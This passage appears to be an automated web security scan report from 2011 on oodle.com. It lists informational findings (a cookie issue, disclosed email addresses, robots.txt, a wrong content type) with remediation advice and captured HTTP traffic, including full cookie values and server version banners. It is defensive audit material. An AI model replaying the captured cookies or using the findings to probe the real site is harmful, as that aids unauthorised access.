GET /pro/register/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 301 Moved Permanently Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Location: https://secure.oodle.com/pro/register/?partner=www®ion=usa&o_ip_address=tRfj_96RCewLtO6cJOZW7LP8iR6yS1by Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:27 GMT Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA2Nzt9; path=/; domain=.oodle.com Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /regions/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:45 GMT Content-Length: 22256 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA4NTt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
6. Email addresses disclosedpreviousnext There are 3 instances of this issue:
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
sales@oodle.com
Request
GET /info/partner/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:29 GMT Content-Length: 21966 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyOTt9; path=/; domain=.oodle.com
The following email address was disclosed in the response:
abuse@oodle.com
Request
GET /info/privacy/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:28 GMT Content-Length: 26885 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyODt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]... <a href="http://www.oodle.com/info/help/?&node_id=2&mode=contact">abuse@oodle.com</a> ...[SNIP]...
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.
The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
Request
GET /robots.txt HTTP/1.0 Host: www.oodle.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/plain;charset=utf-8 Date: Sat, 19 Mar 2011 13:46:32 GMT Content-Length: 1254 Connection: close
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private, max-age=2592000 P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Expires: Tue, 22 Feb 2011 00:20:46 GMT Content-Type: image/gif Date: Sat, 19 Mar 2011 13:49:18 GMT Connection: close Vary: Accept-Encoding Content-Length: 1150